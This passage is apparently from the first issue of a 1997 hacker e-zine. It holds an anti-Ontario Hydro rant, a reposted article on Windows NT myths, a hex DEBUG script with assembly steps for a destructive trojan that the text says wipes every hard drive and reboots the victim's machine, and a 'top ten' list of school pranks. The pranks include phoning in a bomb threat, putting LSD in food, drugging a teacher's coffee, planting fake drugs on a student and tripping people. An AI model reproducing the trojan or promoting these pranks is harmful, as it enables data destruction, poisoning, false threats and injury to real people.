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communist-like believe that they need to control the hydroelectric power
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industry. Andognini responds to the question of deregulation by predicting
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Hydro will be ready for an "open market" in 2 years. However, competition
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and deregulation are words that are foreign in this red province.
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Ontario Hydro's actions should be of great concern. Due to gross
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mismanagement, Hydro's nuclear reactors have not been properly maintained
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and are operating past their prime. Chemical leaks have been occurring on a
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consistent basis for 20 years, although many have been covered up until
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now. It is not unreasonable to agree with Andognini's finding that Hydro
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is at best minimally prepared for a huge disaster. Therefore, we have old,
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poorly maintained reactors and staff that are not prepared. In my opinion,
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that leads me to believe that there is a realistic chance of meltdown at any
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of the nuclear reactors.
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The Ontario Hydro monopoly must end. It has proven to be a total failure.
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They have lost all of their credibility and should not be trusted. Hydro is
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a tremendous drain on taxpayers and a disaster waiting to happen. A disaster
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that could make Chernobyl look like a little bit of acid rain. The only
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sensible course of action is for Hydro to get out of the power business. The
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entire industry should be deregulated and opened up to competition. In the
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United States, the power industry has been deregulated in some states since
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1992. Since then five nuclear power plants have been shut down because they
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were fiscally unreasonable. More economical ways were found to provide those
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areas with power.
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Unfortunately it is business as usual at Ontario's disgraced power
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monopoly. Now Ontario Hydro is talking about "shutting down the reactors
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at the end of their lifespan." As the nuclear reactors continue to deteriorate,
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Harris can't let go of any power. He is hellbent on becoming the dictator of
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Ontario, and controlling the only source of power in Ontario gives *him* power. And
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Ontario Hydro's executives (new and old) are in a mode of panic, doing
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anything they can to maintain their monopoly. With no competitors
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(predators) they can continue to operate under the status quo. The scandal
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will be forgotten by most of the media and public until Hydro faces another
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self induced disaster. We can only hope that the next one doesn't cost us all
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our lives. CANDU can meltdown.
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(C)opyright 1997 Written by Damage, INC.
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{REPORTS} FROM THE FRONT -
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WINDOWS NT LIES By ED BOTT Garnered from ZDNet
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What is it about the computer industry that compels people to stretch the
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truth past the breaking point? Every week we dig through a pile of press
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releases, news clippings, white papers, and reviewer's guides, most of them
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filled with rumors, half-truths, exaggerations, false conclusions, tap
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dancing, and spin that's gone completely out of control. Not to mention
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outright whoppers.
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This year, for the third straight year, we've gathered a collection of the ten
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most popular lies about the trendiest technology. In 1995 it was no trouble
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to round up ten lies about Windows 95. Last year we focused on the Internet.
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LIST OF LIES
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Runs-anywhere
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Secure
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Military Standards
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Crash-proof
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Server Value
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Notebooks
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Replace Win95
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Zero Administration
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Death by NC
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This year we set our sights on Microsoft Windows NT. Why NT? After Microsoft
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tacked the Windows 95 shell onto NT, it was suddenly the hottest software
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around, and when you're hot, people talk. But the trouble with NT is its
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enormous complexity, which makes it hard to craft a simple marketing message.
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That means Microsoft occasionally oversimplifies issues and smooths over the
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rough edges in NT. And Microsoft bashers can have a field day using technical
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trivia to reach unwarranted conclusions.
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Just once, we'd like to read a press release that didn't sound like an outtake
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from Jim Carrey's Liar Liar. Somehow we don't think that's going to happen
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anytime soon, though. Want to know what's really going on with Windows NT?
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We've got the truth, the whole truth, and nothing but the truth.
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By ED BOTT
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Illustrations by REGAN HONDA
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Lie 1
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NT Works with Most PCs
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What's made DOS and Windows so successful? Arguably, it's their run- anywhere
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nature. Take a shopping cart full of spare PC parts, slap 'em into a case, and
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you'll be able to boot up Windows 95. But try the same experiment with NT, and
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you'll probably find yourself staring at the dreaded Blue Screen of Death.
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Microsoft claims that "Windows 95 supports one-third more device drivers than
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does Windows NT Workstation (approximately 1,000 more drivers). . . However,
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certain types of devices, such as video, audio, and PCMCIA are areas where
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Windows NT Workstation support falls short of Windows 95." Right conclusion,
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wrong numbers. In the interest of science, we pulled down the Windows 95 and
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NT 4.0 Hardware Compatibility Lists (HCL) and started counting.
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There are nearly 1,500 more entries on the Windows 95 HCL than on its NT 4.0
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counterpart. Surprisingly, there are 397 more printers and 565 more analog
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modems on NT's HCL, leading one to suspect that those categories on the
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Windows 95 HCL haven't been updated recently. One in three x86 systems that
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work with Windows 95 sputters and dies when faced with NT. If you've got an
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older audio adapter or network card, you'll probably need to replace it before
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you upgrade your operating system. NT experts won't even think of purchasing
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hardware without checking the HCL. Now you know why.
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Lie 2
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NT Is Less Secure Than Unix
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Judging by the flurry of headlines in the first half of 1997, the most popular
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sport on college campuses is hacking Microsoft software. This year's most
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serious NT security scare first popped up on newsgroups in March with the
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release of PWDump and NTCrack, a pair of homegrown utilities that let system
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administrators attack the encrypted password file on an NT machine in search
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of weak passwords. The story spread to the mainstream press at Internet speed
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after Electronic Engineering Times published a front-page story with the
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screaming headline "'Hack' punches hole in NT nets' security." The conclusion?
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System administrators should avoid NT in favor of the inherently safer Unix
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operating system.
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The EE Times story was riddled with technical errors, and it completely
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missed the point. Both Unix and NT have ample security features, including
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industrial-strength logon routines and well-protected file systems. Any idiot
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can configure any server--Unix or NT--so that its built-in security is
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compromised. The new utilities are simply NT versions of well-known Unix
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programs that sniff out insecure passwords by comparing them with entries in a
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dictionary. For a hacker to take advantage of NTCrack, he or she would first
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have to log on as a member of the Administrators group. And once an evildoer
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penetrates the network, there are far more interesting things to do than
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decode passwords.
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Lie 3
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Upgrading from Win95 Is Easy
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The single most compelling new feature in NT 4.0 is the Windows 95 shell. So
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there's an easy upgrade path from Windows 95 to NT 4.0, right? Wrong. In fact,
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while upgrading to NT 4.0 from any older version of Windows or DOS is
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painless, installing NT over Windows 95 is impossible.
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Blame it on fundamental incompatibilities in the system registries for Windows
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95 and NT. While you're at it, sprinkle a heaping helping of responsibility on
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Windows 95's anything-goes support for oddball hardware and virtual device
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drivers (VxDs). Because NT has no way to detect installed devices, doesn't
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recognize VxDs, uses incompatible hardware drivers, and may not recognize the
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file system in use, Microsoft wisely chose to not even try migrating the
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Windows 95 registry to Windows NT.
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If you're planning to move from Windows 95 to NT 4.0, here's what you have to
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do: First, check your system inventory against the official Microsoft NT
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Hardware Compatibility List (at www. microsoft. com/ hwtest), and make sure
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your main hard drive is formatted using the FAT file system. Next, install
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Windows NT into its own directory and reinstall every application as well.
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Even if you're exceptionally well organized, the upgrade will probably take
|
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several days from start to finish.
|
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Microsoft's Migration Market Bulletin sheepishly acknowledges the problem and
|
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offers this bold-faced promise: "Microsoft is completely committed to fixing
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this issue in the next major release of Windows NT Workstation." Now all they
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have to do is figure out how.
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Lie 4
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NT Meets Military Standards
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Windows NT has earned a C2 rating from the U.S. National Security Agency
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(NSA), the spookiest of all the shadowy spy shops surrounding Washington, DC.
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That's an impressive accomplishment, but only if you look at how much red tape
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Microsoft had to go through to get there. In practical terms, the C2 rating is
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underwhelming at best. Here's why.
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As Microsoft freely admits, no operating system is ever C2-certified. Instead,
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the spymasters bestow C2 certification on a specific installation, and the
|
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computer's operating system is only one small piece of that puzzle. If you
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plan to install a C2-compliant system, don't expect to connect with the rest
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of the world, either-- Microsoft chose to submit NT 3.5 for C2 approval (NT
|
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4.0 hasn't been tested yet) using the NSA's "Orange Book" testing procedures
|
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instead of the more stringent "Red Book." That saved time, but it means that
|
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NT is certifiably secure only without any network connections. Would you
|
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install a copy of NT Server without connecting it to another computer? Of
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course not. But as soon as you do, you lose the C2 rating.
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Gee, maybe Microsoft should have applied for the Catch-22 rating instead. . .
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Lie 5
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NT is Robust and Crash-proof
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Everything's relative, especially when the topic turns to the stability of
|
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Windows. Is NT robust? Compared with Windows 95, it's as solid as Gibraltar. A
|
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buggy application locks up Windows 95 so tight only the power switch can undo
|
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the damage. Run the same ill-behaving app under NT, and the app itself
|
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vanishes in a puff of virtual smoke--leaving the rest of the system running
|
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without so much as a hiccup.
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Unfortunately, robust doesn't mean crash-proof. True, you reboot less often,
|
|
but NT has a long way to go before it consistently achieves the uptime that
|
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Unix users take for granted. A buggy driver or a memory conflict in NT's
|
|
internals typically results in STOP errors, also known as the Blue Screen of
|
|
Death, a fatal listing of hexadecimal memory addresses and module names in
|
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bright white letters on a blue background. Even more insidious are memory
|
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leaks, which slowly drain resources from the operating system until
|
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performance becomes so sluggish that rebooting is the only alternative.
|
|
Unfortunately, the Blue Screen of Death isn't rare. Microsoft has created a
|
|
special Web-based troubleshooter to help you decode the top 15 STOP error
|
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messages. Most depressing of all, these crashes are so common that they've
|
|
earned the ultimate in backhanded compliments--their own widely used acronym,
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BSOD.
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WINDOWS NT LIES By ED BOTT Garnered from ZDNet
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Pt. 2:
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Lie 6
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NT Server Is Worth More
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One box is white, the other is blue. That's not the only distinction between
|
|
NT Server (NTS) and NT Workstation (NTW), but you'll need to look at the code
|
|
under a powerful microscope to find more substantial differences. NT has only
|
|
one kernel, you see, and that core code is absolutely identical, no matter
|
|
which version you install.
|
|
Microsoft argues that NTS uses that kernel differently; according to
|
|
Microsoft, the installation process for NTS makes as many as 700 subtle
|
|
changes to entries in the NT registry, including memory- management settings
|
|
and other configuration options. There's also a bundle of utilities and system
|
|
service software in the NTS box that you won't find if you buy the
|
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lower-priced NTW package. But the biggest difference is monetary, not
|
|
technical. At current street prices, you pay $450 extra--about a 150 percent
|
|
premium--to install NTS instead of NTW. If you plan to run a Web server at
|
|
your site, you're caught between a rock and a hard place: Even though
|
|
third-party Web servers run just fine on NTW, Microsoft's license agreement
|
|
won't let you legally run any server software if more than ten users will
|
|
access the site simultaneously. The NTS license, on the other hand, allows
|
|
unlimited connections to your Web server over the Internet; it also includes
|
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Microsoft's Internet Information Server 3.0, which eliminates the need for
|
|
that third-party Web-server software.
|
|
There's no technical barrier to stop you from simply ignoring the license
|
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agreement and running O'Reilly's WebSite or Netscape's FastTrack Server. Of
|
|
course, you would be violating the Microsoft license agreement, and a
|
|
disgruntled employee could turn you in to the Business Software Alliance, with
|
|
consequences including stiff fines and public humiliation. But hey--it's your
|
|
business.
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Lie 7
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NT Works Great on a Notebook
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If you've grown accustomed to Windows 95's world-class support for portable
|
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PCs, your blood pressure will soar an hour into your first cross-country
|
|
flight with an NT notebook.
|
|
Windows 95 can dim the screen, shut down the hard drive, and turn off PC Card
|
|
devices to squeeze extra life out of a battery. NT doesn't do power
|
|
management, period--all systems run at full tilt until they can't run anymore.
|
|
Windows 95 lets you swap PC Cards on the fly. NT has surprisingly good PC Card
|
|
drivers, but you have to restart the system each time you add a new device if
|
|
you expect the operating system to recognize it.
|
|
Thanks to Windows 95's Plug and Play, you can slip a notebook out of its
|
|
docking station, carry it down the hall to a meeting, and begin taking notes
|
|
without missing a beat. NT forces you to reboot and choose a new hardware
|
|
profile each time you change working environments.
|
|
Microsoft promises NT 5.0 will be a better traveler. We'll see. Meanwhile, if
|
|
you need to run NT on the road, ask IBM or Digital Equipment to show you the
|
|
custom code they've written to handle power management and simulate Plug and
|
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Play. And be sure to stock up on extra batteries.
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Lie 8
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NT Will Kill Windows 95
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What do you get when you cross a conspiracy theorist with a technology
|
|
analyst? Add a dash of paranoia to your basic business- school model, and it's
|
|
easy to see patterns where none exist. Take Windows 95 and NT. When Windows
|
|
95 debuted, some analysts theorized that it was simply a placeholder that
|
|
would quietly disappear when Windows NT 4.0, Microsoft's real strategic
|
|
product, appeared. If that's true, then Windows 95 has been the most
|
|
successful disposable consumer product ever introduced.
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Windows 95 and Windows NT have completely different target markets. The former
|
|
is aimed directly at home users, for whom fun and games are a higher priority
|
|
than productivity. Windows NT, on the other hand, requires a secure logon and
|
|
refuses to acknowledge the existence of many games, which makes it a model
|
|
citizen in the corporate world.
|
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Someday Windows 95 and NT will share a common code base. Just this year
|
|
Microsoft product planners hinted that the merged kernel will be ready in
|
|
1999. Of course, those same sources predicted that Windows 4.0 would be on
|
|
store shelves in mid-1994. Come back in 2001 and we'll tell you all about the
|
|
latest updates to Windows 95 and Windows NT.
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Lie 9
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Zero Administration Is Here
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Bill Gates has built an entire industry around mainframe-killing,
|
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terminal-replacing, do-it-all-on-the-desktop, industry-standard PCs. So
|
|
longtime Windows watchers savored the irony when Microsoft announced its Zero
|
|
Administration Windows initiative. The idea behind ZAW is simple: Rein in
|
|
those maverick desktop PCs and put them back in the firm grip of network
|
|
administrators, with preconfigured, locked-down systems.
|
|
That's a convenient way to keep support personnel from having to rescue poor
|
|
dumb users, but it's hard to imagine those users willingly surrendering their
|
|
desktop PCs. Besides, it doesn't even begin to address the real burdens of PC
|
|
ownership, which still requires hours of upfront administrative effort before
|
|
a user can get to work.
|
|
Zero Administration Windows? Is Microsoft kidding? Maybe it is. One press
|
|
release from Microsoft makes this telling admission: "In effect, 'Zero
|
|
Administration' means zero administration for users." Administrators still
|
|
have to install Windows and approved applications on each user's PC, but they
|
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won't have to clean up after those darned users. What will network managers do
|
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Quake.
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Lie 10
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Network PCs Will Kill NT
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If the computer industry didn't exist, high-tech honchos like Sun
|
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Microsystems' Scott McNealy, Oracle's Larry Ellison, and Microsoft's Bill
|
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Gates would probably have become pro wrestlers. They've certainly mastered the
|
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art of bluster, and the typical product demo, like a World Wrestling
|
|
Federation pay-per-view extravaganza, bears only the most casual relation to
|
|
reality.
|
|
Take the tag-team match that has pitted the Oracle Network Computer and the
|
|
Sun JavaStation against the Microsoft/Intel NetPC. Sun, which owns the Java
|
|
programming language, argues that a fleet of users equipped with Web browsers
|
|
can run any business, as long as Java is powering the servers. Oracle adds the
|
|
technical flourish of an NC Card--a smart card that unlocks your personal
|
|
profile on the network. Microsoft and Intel, of course, contend that Windows
|
|
makes a perfectly good network computer (NC), once you trim away some of its
|
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extra features.
|
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Don't expect your desktop computer to disappear anytime soon, however.
|
|
Dataquest, for example, forecasts that sales of network computers in all forms
|
|
may hit a few million by the year 2000. By contrast, businesses and consumers
|
|
are expected to buy more than 132 million PCs (most equipped with some version
|
|
of Windows) in the first year of the millennium. Java is a work in progress,
|
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and it'll be years before it's widely used on desktop PCs. For most businesses
|
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NCs will replace aging mainframe terminals, not PCs.
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*** Thanks go to Nevada for sending us the above Windows NT article.
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{SOURCE} AND SCRIPTS -
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THE NWO TROJAN:
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This is the source code and debug scripts section. We're going to try to
|
|
include a different virus, trojan or utility every month. Since this is the
|
|
first issue of the Damage, INC. Newsletter, I thought we'd start by featuring
|
|
a special trojan. The NWO trojan is in the spotlight this month. Damage, INC.
|
|
is proud to release the debug script for New World Order. If you wanted or
|
|
expected the source code, that's too fucking bad. ;) In order to use NWO,
|
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you'll need to clip out the debug script below and save it to a file called
|
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NWO.SCR. Then, execute DEBUG < NWO.SCR at a DOS prompt to assemble it. If you
|
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followed those instructions properly, you'll see a file named NWO.COM that is
|
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exactly 830 bytes.
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40-HEX magazine often used this method for including viruses etc. It's the
|
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safest, easiest and best method to use in my opinion, thus Damage, INC. has
|
|
chosen to use debug scripts. We decided to explain how to use DEBUG in case
|
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some readers are beginners and have no experience in this area. In future
|
|
issues, we won't explain how to use this method in detail. Always remember:
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DEBUG < FILENAME.EXT - to assemble debug script files.
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N NWO.COM
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E 0100 B8 52 17 BA 7E 01 3B C4 73 67 8B C4 2D 44 03 25
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E 0110 F0 FF 8B F8 B9 A2 00 BE 7C 01 FC F3 A5 8B D8 B1
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E 0120 04 D3 EB 8C D9 03 D9 53 33 DB 53 CB 0C 01 95 3F
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E 0130 57 63 4A A0 99 A8 FA 5C 9B FB 67 2B 94 AC 7F A2
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E 0140 3B B2 5D 62 EA 81 7C 82 F1 0E 3D 39 3D 1F 9C D0
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E 0150 2A D8 2F C7 A5 83 60 46 86 9F EC C8 2D 2C 9B 4E
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E 0160 6F 74 20 65 6E 6F 75 67 68 20 6D 65 6D 6F 72 79
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E 0170 24 B8 00 09 BA 5F 01 CD 21 CD 20 90 FD 8B F8 4F
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E 0180 4F BE BE 02 03 F2 8B CA D1 E9 F3 A5 FC 87 F7 46
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E 0190 46 BF 00 01 AD 95 BA 10 00 EB 32 90 AD 95 B2 10
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E 01A0 EB 3B AD 95 B2 10 EB 3C AD 95 B2 10 EB 41 AD 95
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E 01B0 B2 10 EB 63 AD 95 B2 10 EB 64 AD 95 B2 10 EB 65
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E 01C0 AD 95 B2 10 EB 66 AD 95 B2 10 72 08 A4 D1 ED 4A
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E 01D0 74 F4 73 F8 33 C9 33 DB D1 ED 4A 74 BF D1 D3 D1
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E 0210 74 26 D1 ED 4A 74 97 72 1F D1 ED 4A 74 96 D1 D3
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E 0220 D1 ED 4A 74 95 D1 D3 D1 ED 4A 74 94 D1 D3 80 FB
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E 0230 02 73 1E 2E 8A BF 2C 01 AC 8A D8 56 8B F7 2B F3
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E 0310 73 00 6A 0B 69 73 20 6E 65 61 72 2E 1B 82 C2 19
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NWO is a powerful trojan that nukes the cursor, keyboard, and all hard drives
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(C: to Z:) on the system. It also writes a New World Order message to every
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hard drive. Upon completion, it coldboots the victim's system. We recommend
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being cautious with NWO. Use at your own risk. Damage, INC. isn't responsible
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if you nuke yourself with anything that we release. In the next issue, we're
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planning to include a copy of RAZORBACK...if it has been fully tested and is
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ready. At any rate, enjoy NWO by Damage, INC.
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ú---[The Journalist's Top Ten List. ]---ú
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One of the regular features of the Damage, INC. Newsletter will be my
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top ten list. Yes I stole the idea from David Letterman, but who cares? :)
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This list will be funnier than his, so read on!
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After one of the shortest summers to date, school is back in, and for all
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you suckers out there who have to attend, there are a few simple things that
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can make school-life into a bearable day.
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But remember, in the event that you get caught, you cannot reveal
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anything regarding a "damaging" newsletter or some such shit.
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{TOP TEN} List of Pranks to pull at school:
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1. At lunch hour, drop a *BANANA* (not a banana-peel) into a congested
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hallway. Watch as people walk over or around the banana, but when
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your mark is the high-school snob who keeps his/her nose pointed to
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the ceiling, you're sure to be in for a laugh.
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2. A oldie but goodie, try and exchange the O'Canada tape for Adam Sandler
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or Howard Stern. It has to be something with bad taste, otherwise the
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joke just isn't fun! ;)
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3. When a minor-niner asks you for directions, give him the directions
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to the principal's office, then go to an empty room and page the
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principals secretary. Tell her you are a new teacher here, and this
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student just started masturbating in class. Only do this to people
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who aren't suicidal ;)
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4. Tie a strand of fishing line across the bottom of some stairs in the
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school somewhere. Sit back and laugh as people "launch" their books
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into the crowd of people. A good one to fuck over the much-hated
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"brown-noser" who deserves to have his perfect notes scattered around
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the floor for everyone to steal.
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5. This one doesn't need much explanation - Go to the Party Hut in
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Stone Rd. Mall and pick up a box of stink bombs. If you execute this
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right, the school might have to be evacuated and you get to miss class.
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6. Another way to miss class is call in a bomb threat from the payphone
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inside the school. You could even go to the lengths of creating a
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"fake" bomb, complete with ticking clock. Tell the authorities you
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will blow up the school if the principal does not admit to the students
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he used to fuck sheep when he was a kid. (make sure you get that one
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on videotape!) :)
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7. Try your hand at lock-picking. You'd be surprised at how little guilt
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you feel over stealing a niner's new discman.
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8. Sneak into the Cooking class and exchange flour for custard powder,
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cayenne pepper for baking soda. Fill the vanilla extract bottle with
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40% Rum instead. And if you're really generous, you could even drop
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a few hits of acid in there. Once again, make sure your mark is not
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suicidal! ;)
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9. Find the school's biggest browner, and when he's in the library
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(when *ISN'T* the geek in the library??) slip a book into his bag when
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he's not looking. The student will probably stroll right past the
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detectors, and BEEP BEEP BEEP! His face will go red, and you and your
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friends will be laughing hysterically in the corner. If you have a
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particular hatred for this guy, slip a homemade "sheet of acid" or a
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baggie full of oregano into his bag. Watch him talk his way out of that
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one!
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10. Drop laxative into the new teacher's coffee. If you've never tried this
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before, do it! Such a simple manoeuvre can cause so much shit its
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hilarious ;)
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{CLOSING} COMMENTS:
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The first issue of the Damage, INC. Newsletter is now a reality and a success.
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The h/p scene in this area was lacking a source of information, and now we
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are providing it to everyone. A forum for the discussion of these topics was
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needed. It should be the duty of those in the local h/p scene to contribute
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articles and lend support to us. Otherwise, the h/p scene locally will weaken
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and slowly die a painful death... It's obvious that 519 is already infested
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with lamers, warez pups and politically correct idiots. They are the enemy.
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Don't allow them to take control of this area and destroy interest in h/p.
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With continued growth, the h/p scene in this area has the potential to become
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respected and powerful. That being said, Damage, INC. is proud to welcome
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The Journalist as our newest Member. We also have an announcement to make:
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Freedom of Information Archives is the new Damage, INC. Dist. Site. It will
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distribute our releases to Guelph and surrounding area. We were already the
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force in this area, but now Damage, INC. is *the* source for h/p information.
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We've grown and become even stronger. ;)
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In the next issue of the Damage, INC. Newsletter, look for articles about
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Big Brother and encryption, the Media, Bell, more h/p information, and more
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conspiracies and corruption being exposed. Also, we are planning to include
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the RAZORBACK trojan as well as a list of h/p web sites for you to check out.
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We're looking for Writers, Members and Distribution Sites. If you'd like to
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apply to Damage, INC. and join a respected h/p group, then download a copy of
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the Damage, INC. Application Generator. If you want any of our text releases,
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trojans and utilities they are available on the following boards:
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...AND JUSTICE FOR ALL - Damage, INC. WHQ, h/p/a/c/v/t, no ratios, invite only.
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Freedom of Information Archives - Damage, INC. Dist. Site, h/p/a/c/v/t.
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In the future, we plan to setup the Damage, INC. web site to distribute our
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releases. If you have any comments or suggestions, contact us at one of the
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boards above.
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- EOF
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